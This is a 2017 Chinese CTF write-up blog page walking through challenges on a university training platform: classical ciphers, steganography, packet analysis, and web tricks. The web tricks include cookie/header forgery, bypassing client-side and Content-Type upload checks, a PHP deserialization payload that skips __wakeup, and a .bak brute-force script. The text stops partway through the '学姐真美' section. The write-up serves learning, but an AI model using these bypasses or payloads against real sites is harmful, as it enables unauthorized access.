<!DOCTYPE html>
<html lang="zh-CN">
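  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- maximum-scale=1 removed: it blocked pinch-zoom on mobile (WCAG 1.4.4)
         and gave no layout benefit in return -->
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">

    <meta name="theme-color" content="#f8f5ec">
    <meta name="msapplication-navbutton-color" content="#f8f5ec">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

    <meta name="description" content="天朝挖煤CTF">
    <meta name="keywords" content="ctf, writeup, 密码, 隐写, 八一">
    <meta name="baidu-site-verification" content="HhUstaSjr0">
    <!-- NOTE(review): this value has the shape of the Google Analytics property id
         used in the script below, not a Search Console verification token; confirm
         against the Search Console settings before relying on it -->
    <meta name="google-site-verification" content="UA-102975942-1">

    <title> 天朝挖煤CTF - 八一 </title>

    <!-- type lets feed readers discover the Atom feed without fetching it first -->
    <link rel="alternate" type="application/atom+xml" href="/atom.xml" title="八一">
    <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0">
    <link rel="canonical" href="https://bay1.top/2017/03/02/天朝挖煤ctf/">

    <link rel="stylesheet" href="/css/style.css?v=2.6.0">
    <link rel="stylesheet" href="/css/prettify.css" media="screen">
    <link rel="stylesheet" href="/css/sons-of-obsidian.css" media="screen">
    <link rel="stylesheet" href="/lib/fancybox/jquery.fancybox.css">

    <!-- Both analytics loaders below are inline bootstraps that inject a third-party
         script tag. A strict Content-Security-Policy would need a nonce or hash for
         each of them (or the bootstrap moved to an external file) plus script-src
         entries for hm.baidu.com and www.google-analytics.com. -->
    <script id="baidu_analytics">
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
        // insert before the first script tag so the loader runs as early as possible
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>

    <script id="google_analytics">
      // Standard analytics.js bootstrap, unminified for readability. The loader URL
      // is now an explicit https: URL instead of a protocol-relative one.
      (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments); };
        i[r].l = 1 * new Date();
        a = s.createElement(o);
        m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m);
      })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');

      ga('create', 'UA-102975942-1', 'auto');
      ga('send', 'pageview');
    </script>
  </head>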

  <body>


    <div class="container" id="mobile-panel">

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          天朝挖煤CTF
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-03-02
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#你的石锅拌饭"><span class="toc-text">你的石锅拌饭</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#魂斗罗"><span class="toc-text">魂斗罗</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cookies"><span class="toc-text">cookies?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#我就想试试这个名字到底能够起多长"><span class="toc-text">我就想试试这个名字到底能够起多长</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传一"><span class="toc-text">上传一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#备份"><span class="toc-text">备份</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#colorSnake"><span class="toc-text">colorSnake</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#自动获取flag程序"><span class="toc-text">自动获取flag程序</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#萌萌哒"><span class="toc-text">萌萌哒</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#听说你会面向对象"><span class="toc-text">听说你会面向对象</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传二"><span class="toc-text">上传二</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#听说这是一道签到题目"><span class="toc-text">听说这是一道签到题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#学姐真美"><span class="toc-text">学姐真美</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#白驹过隙"><span class="toc-text">白驹过隙</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#logic"><span class="toc-text">logic</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传三"><span class="toc-text">上传三</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phpmywind"><span class="toc-text">phpmywind</span></a><ol class="toc-child"><li class="toc-item 
toc-level-3"><a class="toc-link" href="#获取基本信息"><span class="toc-text">获取基本信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#也可以这样一个个爆库"><span class="toc-text">也可以这样一个个爆库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆表"><span class="toc-text">爆表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆字段"><span class="toc-text">爆字段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#显示flag"><span class="toc-text">显示flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#md5"><span class="toc-text">md5</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>中国矿业大学网络安全实训平台 <a id="more"></a></p>
<h2 id="你的石锅拌饭"><a href="#你的石锅拌饭" class="headerlink" title="你的石锅拌饭"></a>你的石锅拌饭</h2><p><img src="https://s1.ax1x.com/2018/01/01/pSfFWF.png" alt="SGBF.png"></p>
<blockquote>
<p>打开<a href="http://219.219.61.234/challenges.php##你的石锅拌饭。" target="_blank" rel="noopener">链接</a>还是原来的页面,仔细读那几句话，发现培根，而且这段话字体不同，<br>想到培根密码。百度查表可知flag。此题源于学校三食堂有名的石锅拌饭。。。。。</p>
</blockquote>
<h2 id="魂斗罗"><a href="#魂斗罗" class="headerlink" title="魂斗罗"></a>魂斗罗</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenges.php##魂斗罗" target="_blank" rel="noopener">链接</a>是一个文件，分析可知是个游戏，用模拟器打开就是经典的魂斗罗，<br>提示是：上上下下左右左右，百度可知作弊代码就是这段话，下载金手指，选关即可通过。<br>PS：注意flag的形式，仔细看清楚再提交哦</p>
</blockquote>
<h2 id="cookies"><a href="#cookies" class="headerlink" title="cookies?"></a>cookies?</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/web/cookiiii/" target="_blank" rel="noopener">链接</a>，显示让以管理员身份登录，在谷歌或者火狐浏览器中<br>F12，重新编辑消息头，修改user=admin<br>提交，响应为<br><img src="https://s1.ax1x.com/2018/01/01/pSREhF.png" alt="cookies.png"><br>在网址后添加k.jpg,得到一张大佬的图片<br><img src="https://s1.ax1x.com/2018/01/01/pSRAtU.png" alt="cookies1.png"><br>丢进百度识图，可知维吉尼亚密码，对照表，有提示key:e，我就移动四位，得<strong>bpqaqaivwtlmvkzgxb</strong><br>自信的去提交flag…..显示错误。顿时崩溃，，，看来手动解是解不出来了。<br>丢进凯撒密码，列出所有可能，flag一般是一句话，找出就得flag<br><img src="https://s1.ax1x.com/2018/01/01/pSRZp4.png" alt="cookies2.png"><br>PS:凯撒密码是维吉尼亚密码的升级版（自我感觉）</p>
</blockquote>
<h2 id="我就想试试这个名字到底能够起多长"><a href="#我就想试试这个名字到底能够起多长" class="headerlink" title="我就想试试这个名字到底能够起多长"></a>我就想试试这个名字到底能够起多长</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/misc/flag.png" target="_blank" rel="noopener">链接</a>是一张图片</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2b0P.png" alt="yinxie1.png"></p>
<blockquote>
<p>提示有说是常规隐写，所以直接丢进Stegsolve<br>点击左右键，发现Red plane 2,Red plane 1,Red plane 0三处变化较大，点击右上角进行数据分析<br>发现0处数据为PK开头，百度文件类型，可知为压缩包，改后缀.zip，解压得到一个文件，丢进Winhex</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS25SH.png" alt="yinxie1-0.png"></p>
<blockquote>
<p>搜索ctf得到flag</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2Ild.png" alt="yinxie1-1.png"></p>
<h2 id="上传一"><a href="#上传一" class="headerlink" title="上传一"></a>上传一</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/web/uploadfile/" target="_blank" rel="noopener">链接</a>,是一个上传文件的页面，我就开始各种百度<br>有种方法说可以修改后缀，我就一直尝试各种加;jpg,.rar。最后才知道那是解析漏洞，需要针对特殊的事件<br>然后我就开始了一件很智障的事情，在F12中修改js源码，。。。。然而没什么卵用。<br><img src="https://s1.ax1x.com/2018/01/01/pSfkz4.png" alt="shangchuan1.png"><br>当然没什么用，又没有修改服务器里的源码，也没有任何的响应。只能欺骗自己<br>最后询问后端组长之后，分析了js代码，知道check函数是全局变量，可以在控制台修改<br>操作成功，抱着组长大腿痛哭流涕，完全不懂前端，然后就可以上传可执行文件了。<br><img src="https://s1.ax1x.com/2018/01/01/pSfEQJ.png" alt="shangchuan1-1.png"></p>
</blockquote>
<p><em>PS</em>:JS定义全局变量有三种方式<br><strong>直接定义全局变量</strong></p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> check=<span class="number">1</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span><span class="params">()</span></span>&#123;</span><br><span class="line">.....</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>不用var，直接隐式定义</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">check=<span class="number">1</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>在控制台中直接输入window定义</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">window</span>.check </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">....</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<hr>
<div align="center">我是分割线-补充于2017-03-13 23:30:17</div>

<p>太菜了，也只能继续更新我天朝挖煤大学的题目了。。。。。<br>以下三道是组长帮助，所以就单独列出来了</p>
<h2 id="备份"><a href="#备份" class="headerlink" title="备份"></a>备份</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/web/code/" target="_blank" rel="noopener">链接</a>,显示1.bak,2.bak<br>我又试了试3.bak,5.bak都有内容显示，所以可以想到flag就在某个*.bak<br>一开始我并不会写python,之后学了点，在组长的指导下，自己写出来了这段代码</p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">3</span>,<span class="number">1000</span>):</span><br><span class="line">   t = requests.get(<span class="string">'http://219.219.61.234/challenge/web/code/'</span>+str(i)+<span class="string">'.bak'</span>)</span><br><span class="line">   <span class="keyword">print</span> (i)</span><br><span class="line">   <span class="keyword">if</span> <span class="string">'flag'</span> <span class="keyword">in</span> t.text:</span><br><span class="line">       print(t.text)</span><br><span class="line">   <span class="keyword">else</span> :</span><br><span class="line">       <span class="keyword">continue</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>怎么说呢，这道题会写代码了，就很简单了。<br>直接贴代码，让它运行就好了。。。。。。吗？？？??<br>很不幸的是抛出了一大堆异常，连接服务器总是中断，那么问题来了：如何解决python的异常？<br>就是try…except…</p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span>:</span><br><span class="line">	<span class="comment">##你要执行的但是可能出现异常的代码</span></span><br><span class="line"><span class="keyword">except</span> (NameError,....):<span class="comment">##错误类型</span></span><br><span class="line">	<span class="comment">##出现了错误要做什么</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	<span class="comment">##没错误要做什么</span></span><br><span class="line"><span class="keyword">finally</span>:</span><br><span class="line">	<span class="comment">##无论上方是否抛出异常，都会执行这句话</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>大概就是这三种<br>最后的代码是这样的，竟然flag是900多。。。。。</p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">traverse</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">1000</span>):</span><br><span class="line">		t = requests.get(<span class="string">'http://219.219.61.234/challenge/web/code/'</span>+str(i)+<span class="string">'.bak'</span>)</span><br><span class="line">		<span class="keyword">if</span> i%<span class="number">50</span> == <span class="number">0</span>:</span><br><span class="line">			<span class="keyword">print</span> (i)</span><br><span class="line">		<span class="keyword">if</span> <span class="string">'flag'</span> <span class="keyword">in</span> t.text:</span><br><span class="line">			print(t.text)</span><br><span class="line">		<span class="keyword">else</span> :</span><br><span class="line">			<span class="keyword">continue</span></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">	traverse()</span><br><span class="line"><span class="keyword">finally</span>:</span><br><span class="line">	traverse()</span><br></pre></td></tr></table></figure>
<h2 id="colorSnake"><a href="#colorSnake" class="headerlink" title="colorSnake"></a>colorSnake</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/colorSnake/" target="_blank" rel="noopener">链接</a>,真的是一个贪吃蛇游戏，还是炫彩的。。orz<br>看到这道题第一次还是忍不住玩了一下，但是真的好难。。。。233333<br>随后先F12查看源码，一直没有头绪，最后也是在组长的和组内大佬讨论下，尝试了改分数，改food出现位置，，，，然而都没有用<br>最后，找到这段getScore代码，在控制台提交，分数变了。所以接下来直接调用JS计时器</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">setInterval(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;xhr(<span class="string">'./getScore.php'</span>,<span class="function"><span class="keyword">function</span>(<span class="params">e</span>)</span>&#123;</span><br><span class="line">               <span class="keyword">var</span> r = <span class="built_in">JSON</span>.parse(e);</span><br><span class="line">               <span class="keyword">if</span>(r.state == <span class="number">200</span>)</span><br><span class="line">                   game.addScore(r.score);</span><br><span class="line">               <span class="keyword">else</span>&#123;</span><br><span class="line">                   alert(r.msg);</span><br><span class="line">                   game.start()</span><br><span class="line">               &#125;</span><br><span class="line">           &#125;)&#125;,<span class="number">1000</span>)</span><br></pre></td></tr></table></figure>
<p>PS:<strong>JS计时器setInterval</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">setInterval(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;alert(<span class="string">"Hello"</span>)&#125;,<span class="number">1000</span>);</span><br></pre></td></tr></table></figure>
<blockquote>
<p>这里记录一下，对于这个计时器我也是鼓捣好久，已经让我怀疑不适合学计算机。。。。<br>setInterval(function(){这里面填写要执行的代码}),一开始我老是纠结第一个参数明明是函数代码，为什么<br>不能直接贴上函数代码，非要加个function,说实话，现在也是似懂非懂，可能还是没学过JS吧。。。<br>这里的参数function是一个函数名或者一个对匿名函数的引用</p>
</blockquote>
<blockquote>
<p>简单的示例，可以自行百度</p>
</blockquote>
<h2 id="自动获取flag程序"><a href="#自动获取flag程序" class="headerlink" title="自动获取flag程序"></a>自动获取flag程序</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/ctf0001/" target="_blank" rel="noopener">链接</a>，是一个未完整的程序<br>那就很自然的F12查看源码，提示已经说了是要修改代码,下面是它给的源码</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 请求参数一</span></span><br><span class="line">$(<span class="string">"##a"</span>).click(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">	$.ajax(&#123;</span><br><span class="line">		url:<span class="string">'param1.php'</span>,</span><br><span class="line">		method:<span class="string">'get'</span>,</span><br><span class="line">		dataType:<span class="string">'json'</span>,</span><br><span class="line">		success:calParam2</span><br><span class="line">	&#125;)</span><br><span class="line">&#125;);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">calParam2</span>(<span class="params">d</span>)</span>&#123; <span class="comment">// 获取参数d</span></span><br><span class="line">	<span 
class="keyword">var</span> data=<span class="built_in">JSON</span>.parse((d.param));</span><br><span class="line">	<span class="keyword">var</span> length=data.length;</span><br><span class="line">	<span class="keyword">var</span> second=<span class="keyword">new</span> <span class="built_in">Date</span>().getSeconds();</span><br><span class="line">	<span class="keyword">var</span> sum=<span class="number">0</span>;</span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">1</span>; i &lt; length; i++) &#123;</span><br><span class="line">		<span class="keyword">for</span> (<span class="keyword">var</span> j = <span class="number">0</span>; j &lt; length/<span class="number">2</span>; j++) &#123;</span><br><span class="line">			sum+=<span class="built_in">parseInt</span>(data[i])*second + data[j];</span><br><span class="line">		&#125; <span class="comment">// 应该是用for循环求出参数各个数值和</span></span><br><span class="line">	&#125;</span><br><span class="line"><span class="comment">// 请求flag</span></span><br><span class="line">$.ajax(&#123;</span><br><span class="line">	url:<span class="string">'http://new.pmcaff.com/aram2.php?param='</span>+sum, <span class="comment">// 这里url对着上面的url明显是错误的</span></span><br><span class="line">	method:<span class="string">'get'</span>,</span><br><span class="line">	dataType:<span class="string">'json'</span>,</span><br><span class="line">	success:<span class="function"><span class="keyword">function</span>(<span class="params">s</span>)</span>&#123;</span><br><span class="line">		alert(s.f);</span><br><span class="line">	&#125;,</span><br><span class="line">	error:<span class="function"><span class="keyword">function</span>(<span class="params">s</span>)</span>&#123;</span><br><span class="line">		alert(<span class="string">'错了'</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;)</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>打开./param1.php,得到的是一堆url</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">"param"</span>:</span><br><span class="line">	<span class="string">"%5B%221%22%2C%226%22%2C%222%22%2C%228%22%2C%224%22%2C%222%22%2C</span></span><br><span class="line"><span class="string">	%228%22%2C%224%22%2C%229%22%2C%221%22%2C%2210%22%5D"</span>&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>解码得到一个数组，那就对了,可以求和(JSON.parse的作用就是处理数据让他可以加和)<br>然后第二个url对照第一个改为：’param2.php?param=’+sum,但是程序中直接得到的参数是编码的<br>所以在程序中加上解码语句<strong>d.param=unescape(d.param)</strong></p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">	function calParam2(d)&#123;</span><br><span class="line">	d.param=unescape(d.param);</span><br><span class="line">	var data=JSON.parse((d.param));</span><br><span class="line">	var length=data.length;</span><br><span class="line">	var second=new Date().getSeconds();</span><br><span class="line">	var sum=<span class="number">0</span>;</span><br><span class="line">	<span class="keyword">for</span> (var i = <span class="number">1</span>; i &lt; length; i++) &#123;</span><br><span class="line">		<span class="keyword">for</span> (var j = <span class="number">0</span>; j &lt; length/<span class="number">2</span>; j++) &#123;</span><br><span class="line">			sum+=parseInt(data[i])*second + data[j];</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	// 请求flag</span><br><span class="line">	$.ajax(&#123;</span><br><span class="line">		url:<span class="string">'param2.php?param='</span>+sum,</span><br><span class="line">		method:<span 
class="string">'get'</span>,</span><br><span class="line">		dataType:<span class="string">'json'</span>,</span><br><span class="line">		success:function(s)&#123;</span><br><span class="line">			alert(s.f);</span><br><span class="line"></span><br><span class="line">		&#125;,</span><br><span class="line">		error:function(s)&#123;</span><br><span class="line">			alert(<span class="string">'错了'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>为什么要加上d.param而不是参数d呢？我没学过JS，但是看参数d的形式就是python字典，要解码的是字典里的后半部分<br>还有，就是我一开始在控制台输入之后，会一直弹出”呵呵呵呵”，根据组长的解释是传递参数错误才会这样，这一段<br>是和时间参数有关系的，所以。。。。。。。根据我的实践，就是多点几次，，，，可能就是成功了。这是我的理解。<br>真正的理解还望指教</p>
</blockquote>
<hr>
<div align="center">我是分割线-补充于2017-03-25 18:17:01</div>

<p>233333333333orz，扶我起来，我还能水</p>
<h2 id="萌萌哒"><a href="#萌萌哒" class="headerlink" title="萌萌哒"></a>萌萌哒</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/misc/fxxk/encodes.php" target="_blank" rel="noopener">链接</a>,和提示一样，显示的是一堆类似表情包<br>真的是萌萌哒啊。。。。。。<br>这一堆是什么东西。不知道 就百度 就谷歌呗，最后做出来才知道，是两种加密<br>第一种就是颜表情包解码<a href="https://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html" target="_blank" rel="noopener">点我进解码地址</a><br>解码得到下图结果</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWUGF.png" alt="mengmengda"></p>
<blockquote>
<p>改地址进入，又是一堆只有八个操作符的东西，，，，，老方法，不知道，就百度呗<br>最后知道这是一种语言–&gt;<span style="color: red;">Brainfuck</span><br>又是百度，各种姿势搜索，找到了解码地址<a href="https://www.splitbrain.org/services/ook" target="_blank" rel="noopener">点我</a><br>丢进去，转码得flag！<br>自己不会写工具就只能这样了，搜搜搜。</p>
</blockquote>
<hr>
<div align="center">我是分割线-补充于2017-04-7</div>


<h2 id="听说你会面向对象"><a href="#听说你会面向对象" class="headerlink" title="听说你会面向对象"></a>听说你会面向对象</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/php_object_injection/" target="_blank" rel="noopener">链接</a>，看见链接我们就会知道是PHP反序列化漏洞<br>但是身为小白的我不会什么PHP啊，也不知道什么是反序列化，老办法-搜搜搜。。。。</p>
</blockquote>
<p><strong>什么是反序列化？</strong></p>
<blockquote>
<p>这问题就不赘述了，说了也是看的别人的，贴链接<br>这是介绍反序列化的<a href="http://www.2cto.com/article/201610/557427.html" target="_blank" rel="noopener">点我</a><br>所以我们直接构造<span style="color: red;">data=O:5:”Admin”:1:{s:4:”file”;s:8:”flag.php”;}</span>,但是。。。<br><img src="https://s1.ax1x.com/2018/01/01/pSRe1J.png" alt="ctf3-1.png"></p>
</blockquote>
<blockquote>
<p>很明显是<code>__wakeup()</code>是它在搞事情，那么下面我们要做的就是绕过它<br>经过搜搜搜搜，知道此函数的一个漏洞<br><span style="color: red;">PHP当序列化字符串中表示对象属性数的值大于真实的属性个数时会跳过</span><code>__wakeup()</code>的执行<br><img src="https://s1.ax1x.com/2018/01/01/pSRM0x.png" alt="ctf3-2"></p>
</blockquote>
<p>总体来说这道题还是比较基础和简单的，只是我太菜了，。。做了好长时间，不过也长了不少知识</p>
<h2 id="上传二"><a href="#上传二" class="headerlink" title="上传二"></a>上传二</h2><p><strong>首先要说一下几种上传验证手段：</strong></p>
<p>&nbsp;A: 客户端js校验（一般只校验后缀名）<br>&nbsp;B: 服务端校验<br>&nbsp;&nbsp;&nbsp;1.文件头content-type字段校验（image/gif）<br>&nbsp;&nbsp;&nbsp;2.文件内容头校验（GIF89a）<br>&nbsp;&nbsp;&nbsp;3.后缀名黑名单校验<br>&nbsp;&nbsp;&nbsp;4.后缀名白名单校验<br>&nbsp;&nbsp;&nbsp;5.自定义正则校验<br>&nbsp;C: WAF设备校验（根据不同的WAF产品而定）</p>
<blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/uploadfile/" target="_blank" rel="noopener">链接</a>,和上传一地址一样<br>就是接着上传一开始做的，首先修改JS验证<br>然后用Burp抓包，修改文件头content-type字段为：image/gif<br>重新发送即可</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2TOI.png" alt="上传二"></p>
<p>参考文章：<a href="https://xianzhi.aliyun.com/forum/read/458.html?fpage=2" target="_blank" rel="noopener">点我</a></p>
<hr>
<div align="center">我是分割线-补充于2017-04-15 21:27:00</div>

<p>最近平台多的一些学校入门赛的题目，就不写wp了，官方有了<a href="http://www.bxsteam.xyz/2017/04/12/cumtctf2017%E5%85%A5%E9%97%A8%E8%B5%9Bwriteup/" target="_blank" rel="noopener">点我</a></p>
<h2 id="听说这是一道签到题目"><a href="#听说这是一道签到题目" class="headerlink" title="听说这是一道签到题目"></a>听说这是一道签到题目</h2><blockquote>
<p>先贴一个链接，补充点姿势<a href="http://metasploit.lofter.com/post/d9d60_89a1f47" target="_blank" rel="noopener">数据包分析for CTF</a><br>打开<a href="http://202.119.201.199/challenges.php##据说是个签到题" target="_blank" rel="noopener">链接</a><br>很明显是一个抓取的数据包，用Wireshark打开，分析对话，在tcp流，发现异常对话</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfTX9.png" alt="Wireshark-1"></p>
<blockquote>
<p>跟踪tcp流，发现flag信息</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfHmR.png" alt="Wireshark-2"></p>
<blockquote>
<p>而且function.py 这里代码都给出来了</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfqTx.png" alt="Wireshark-3"></p>
<blockquote>
<p>直接解原字符串是不能解的，所以需要先base64<br>具体操作如下，用给出的代码直接解就行了</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfb01.png" alt="Wireshark-4"></p>
<h2 id="学姐真美"><a href="#学姐真美" class="headerlink" title="学姐真美"></a>学姐真美</h2><p>PS：这也是入门赛的一道题，但是感觉涨了姿势，所以想记录下</p>
<blockquote>
<p>orz,这个学姐真的美。。。。。<br>打开链接<a href="http://download.bxsteam.xyz/dream.jpg" target="_blank" rel="noopener">学姐真美</a><br>首先想到的就是隐写术，拖进winhex<br>看到文件前面这一大串00000000000000000000000很让人起疑心啊</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfXtK.png" alt="1"></p>
<p>直接搜索jpg结束符“FF D9”</p>
